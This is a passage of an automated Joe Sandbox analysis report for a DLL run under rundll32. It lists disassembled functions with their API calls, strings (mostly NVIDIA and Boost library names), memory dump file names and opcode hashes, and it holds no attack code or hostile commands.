                                                                    • Instruction ID: d9e2af642f17cad82e8651c8c46ef1ee2e6e8a22bcf8a3d68fa8683ec29e4505
                                                                    • Opcode Fuzzy Hash: b11c5641bf4848fb608eb9749dc857ac8897b4fee8caf6aa4f1a069ddcab5a7a
                                                                    • Instruction Fuzzy Hash: FD215B35A0B742A2EF15DBA1E41057AA2A4FF84BC0F080431DA6D43B55EF3CE918C628
                                                                    Function 00007FF8A8D446F8 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: _com_issue_error$Initialize$Security
                                                                    • String ID:
                                                                    • API String ID: 601672203-0
                                                                    • Opcode ID: 71e2f57c4ad06176b4a5f6e6c297fe6c2ad8f9ea88118bc92160f530134c9719
                                                                    • Instruction ID: 36b8ab13167ea56227b4753055797686b85f437904be2e63bc99185d333352ed
                                                                    • Opcode Fuzzy Hash: 71e2f57c4ad06176b4a5f6e6c297fe6c2ad8f9ea88118bc92160f530134c9719
                                                                    • Instruction Fuzzy Hash: A601C030F2A342A2FB609B30A84133A2951FB813E4F504238D5BA836C0EF7CE0498628
                                                                    Function 00007FF8A8CFC064 Relevance: 7.5, APIs: 5, Instructions: 31memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: DirectoryLocalSystem$AllocErrorFreeLast
                                                                    • String ID:
                                                                    • API String ID: 3438206570-0
                                                                    • Opcode ID: e8e0697e775eeb8f850b266a739133e9cdd53a1c2cc3d1dc94198358dc3c644c
                                                                    • Instruction ID: 7fb2c49946754ed3f476a60e9409269909db96157a6d4c0bdca1e318b61beee3
                                                                    • Opcode Fuzzy Hash: e8e0697e775eeb8f850b266a739133e9cdd53a1c2cc3d1dc94198358dc3c644c
                                                                    • Instruction Fuzzy Hash: D0F05431F0674292FF589B36B84963A5192EF9CBC1F498039C94E86354FF3CE9594618
                                                                    Function 00007FF8A8DE6F50 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 211COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                    • API String ID: 3215553584-1196891531
                                                                    • Opcode ID: b90288df779b9b6e8328ed50a32dda5d8e005626617a8c2cc2b21d174ab3dae3
                                                                    • Instruction ID: 1292a5734309b060c2a751043a0d49c0a3e9aa4777a09f9f4e76f1bab283313a
                                                                    • Opcode Fuzzy Hash: b90288df779b9b6e8328ed50a32dda5d8e005626617a8c2cc2b21d174ab3dae3
                                                                    • Instruction Fuzzy Hash: 0F81B271D0E243A7F7F94A38C65067D2BA0DF127C8F156031CA2E472D5EF2DA8099329
                                                                    Function 00007FF8A8D7DDE0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Init_thread_footerswprintf
                                                                    • String ID: Failed to allocate memory$GridCloudLicensingTrustedStorage.cpp$_tsReadContent
                                                                    • API String ID: 732731317-3783116900
                                                                    • Opcode ID: 27fd23e2e01eff0e6d1b877c01c8bbb73c2517a92e4d72d88ea0487d4f337d1e
                                                                    • Instruction ID: 55f9dd47910f64647587f93235b5c4140b63281228b2b856e90e4429d34158cd
                                                                    • Opcode Fuzzy Hash: 27fd23e2e01eff0e6d1b877c01c8bbb73c2517a92e4d72d88ea0487d4f337d1e
                                                                    • Instruction Fuzzy Hash: A3517D32A0AB82A9EB10DF60E8406EDB7B4FB44398F500136DA5D53B69DF3CE159CB54
                                                                    Function 00007FF8A8D1BD68 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 107COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Getcvt
                                                                    • String ID: false$true
                                                                    • API String ID: 1921796781-2658103896
                                                                    • Opcode ID: 8a79c84103cf4eda12ac1b0f2bcbe0e62bb724e9a1bc4a266add58ddfa309b42
                                                                    • Instruction ID: 0247e428a5de13181b0b5765cbfa2533f2dade2bf5c8a410e3b2f73523df0e55
                                                                    • Opcode Fuzzy Hash: 8a79c84103cf4eda12ac1b0f2bcbe0e62bb724e9a1bc4a266add58ddfa309b42
                                                                    • Instruction Fuzzy Hash: A641F266A0AB81A1EB159B21910427D6BA1EF44FD8F148635CF6D0779ACF3CE41EC368
                                                                    Function 00007FF8A8D95060 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 97libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetProcAddress.KERNEL32(?,?,00000000,00007FF8A8D94FF7,?,?,00000000,00007FF8A8D95263,?,?,00000000,00007FF8A8D95500,?,?,?,00007FF8A8D2F206), ref: 00007FF8A8D9507F
                                                                    • GetProcAddress.KERNEL32(?,?,00000000,00007FF8A8D94FF7,?,?,00000000,00007FF8A8D95263,?,?,00000000,00007FF8A8D95500,?,?,?,00007FF8A8D2F206), ref: 00007FF8A8D95096
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc
                                                                    • String ID: nvapi_Direct_GetMethod$nvapi_QueryInterface
                                                                    • API String ID: 190572456-541830060
                                                                    • Opcode ID: d680ba42e6397bfd4bcb16b1e5d61a8a8567ead19b88992c526a86b536d0f24f
                                                                    • Instruction ID: 6eac5847f7e3481bf9eed6928fd05fb6445899231f8ff04d24544551ce30c06a
                                                                    • Opcode Fuzzy Hash: d680ba42e6397bfd4bcb16b1e5d61a8a8567ead19b88992c526a86b536d0f24f
                                                                    • Instruction Fuzzy Hash: B5412970A0BF02B6EE959B55BD9013432A2EF847D0F480539C9AD47BA4FF3CA4648238
                                                                    Function 00007FF8A8D1E890 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 97COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00007FF8A8D2051C: __std_exception_copy.LIBVCRUNTIME ref: 00007FF8A8D2058E
                                                                      • Part of subcall function 00007FF8A8D96700: EnterCriticalSection.KERNEL32 ref: 00007FF8A8D96710
                                                                      • Part of subcall function 00007FF8A8D20048: __std_exception_copy.LIBVCRUNTIME ref: 00007FF8A8D200BA
                                                                    • _Init_thread_footer.LIBCMT ref: 00007FF8A8D1E9C3
                                                                    Strings
                                                                    • C:\dvs\p4\build\sw\tools\boost\boost-1.62.0\boost/exception/detail/exception_ptr.hpp, xrefs: 00007FF8A8D1E90D
                                                                    • bad exception, xrefs: 00007FF8A8D1E8CD
                                                                    • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 00007FF8A8D1E902
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: __std_exception_copy$CriticalEnterInit_thread_footerSection
                                                                    • String ID: C:\dvs\p4\build\sw\tools\boost\boost-1.62.0\boost/exception/detail/exception_ptr.hpp$bad exception$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                                    • API String ID: 573191702-3549958519
                                                                    • Opcode ID: 91f75407d11eaa5e7c8b77454c6988bd323d2e217cd2083b7fc69055ee39d9d1
                                                                    • Instruction ID: 15e4588d6c9144c100360848de3b694f0e12400e289d2bf9525f166419c38a4d
                                                                    • Opcode Fuzzy Hash: 91f75407d11eaa5e7c8b77454c6988bd323d2e217cd2083b7fc69055ee39d9d1
                                                                    • Instruction Fuzzy Hash: 0B514D32B06F46E9EB10DB64E8402A833B5FB44798F404135DA6D537A5EF3CE568C368
                                                                    Function 00007FF8A8DBB8F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesCreateDirectoryErrorExceptionFileInit_thread_footerLastThrow
                                                                    • String ID: boost::filesystem::create_directory
                                                                    • API String ID: 724045827-2941204237
                                                                    • Opcode ID: 0be57c52dd55e4bdb212c85267b57fad735851d4c37a9902dfc115765fa4dbd2
                                                                    • Instruction ID: 4ab5d5a56bd39b010b22c13d1dcc336f4f50bf930b315bffad8f07157c3e998f
                                                                    • Opcode Fuzzy Hash: 0be57c52dd55e4bdb212c85267b57fad735851d4c37a9902dfc115765fa4dbd2
                                                                    • Instruction Fuzzy Hash: E531A63290EB86E9EB209F24E4443AA73A0FF847D4F144231DAAC07695EF7CD549CB24
                                                                    Function 00007FF8A8DB9BC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: GetTickCount64$KERNEL32.DLL
                                                                    • API String ID: 1646373207-3320051239
                                                                    • Opcode ID: dc403231dfa1d52cf7b6050baa07f30946f08faffa56d843578ffbb4075026e3
                                                                    • Instruction ID: acb6d2ae6c5d748dc5b03654b504ebbfcdfd27a14520365ca4210f1fb6927fa6
                                                                    • Opcode Fuzzy Hash: dc403231dfa1d52cf7b6050baa07f30946f08faffa56d843578ffbb4075026e3
                                                                    • Instruction Fuzzy Hash: 3E310762B1AA81E2DF08CF19E45027833A0EB84BD4F448136E62E477E9EF3CD495C314
                                                                    Function 00007FF8A8D2E43C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInit_thread_footerInstance
                                                                    • String ID: Create Sync Proxy singlton error$GetSyncProxy$NvXDCore.cpp
                                                                    • API String ID: 3436645735-4261199731
                                                                    • Opcode ID: 991a21e73c6d4c671791728da31033ebcb8c2e98bda0386184e0adc56be0fd8b
                                                                    • Instruction ID: 319ab48a5dedd15b957e087381f70ed0a6b0ac5e0e450cef967f098bc1944450
                                                                    • Opcode Fuzzy Hash: 991a21e73c6d4c671791728da31033ebcb8c2e98bda0386184e0adc56be0fd8b
                                                                    • Instruction Fuzzy Hash: D831FC32A06B46E9E710DFA0E4402DD33B8FB4439CF804636DA5D57A99EF38D619C358
                                                                    Function 00007FF8A8CFADB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSystemDirectoryW.KERNEL32(?,?,cryptnet.dll,00007FF8A8CFA9DB), ref: 00007FF8A8CFADDD
                                                                    • LocalAlloc.KERNEL32(?,?,cryptnet.dll,00007FF8A8CFA9DB), ref: 00007FF8A8CFADF9
                                                                    • GetSystemDirectoryW.KERNEL32(?,?,cryptnet.dll,00007FF8A8CFA9DB), ref: 00007FF8A8CFAE0C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: DirectorySystem$AllocLocal
                                                                    • String ID: cryptnet.dll
                                                                    • API String ID: 1371172169-1563376703
                                                                    • Opcode ID: 41d284b39d861a69d634d39cc0ac6990f4b671fd7f177f07053520ddd399bce1
                                                                    • Instruction ID: e80a0e2a5286e2c42bbf8e11bbe88d8f4c87fe4a51f2c78bdf59b5e04eaa8505
                                                                    • Opcode Fuzzy Hash: 41d284b39d861a69d634d39cc0ac6990f4b671fd7f177f07053520ddd399bce1
                                                                    • Instruction Fuzzy Hash: 6E11B126A0A741A6FB449F62A44017DB2A1FF48FC4F884135DE4E43785EF7CF8228B18
                                                                    Function 00007FF8A8D2E30C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • std::current_exception.LIBCMT ref: 00007FF8A8D2E367
                                                                    • std::runtime_error::runtime_error.LIBCPMT ref: 00007FF8A8D2E38A
                                                                      • Part of subcall function 00007FF8A8D00A2C: __std_exception_copy.LIBVCRUNTIME ref: 00007FF8A8D00A68
                                                                    • _CxxThrowException.LIBVCRUNTIME ref: 00007FF8A8D2E39B
                                                                      • Part of subcall function 00007FF8A8DC1390: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF8A8D9B7E3), ref: 00007FF8A8DC140D
                                                                      • Part of subcall function 00007FF8A8DC1390: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF8A8D9B7E3), ref: 00007FF8A8DC144C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Exception$FileHeaderRaiseThrow__std_exception_copystd::current_exceptionstd::runtime_error::runtime_error
                                                                    • String ID: SHGetFolderPathW failed with
                                                                    • API String ID: 530891933-2816540289
                                                                    • Opcode ID: 58610502b58b0b572c1adac7209f5f57e80d41dadf13108b99969dd46fc7d3b2
                                                                    • Instruction ID: 4a8009f017d8a78b6f3fbbaa62d743bda011913b274c44b114fdbab4bdddb4ee
                                                                    • Opcode Fuzzy Hash: 58610502b58b0b572c1adac7209f5f57e80d41dadf13108b99969dd46fc7d3b2
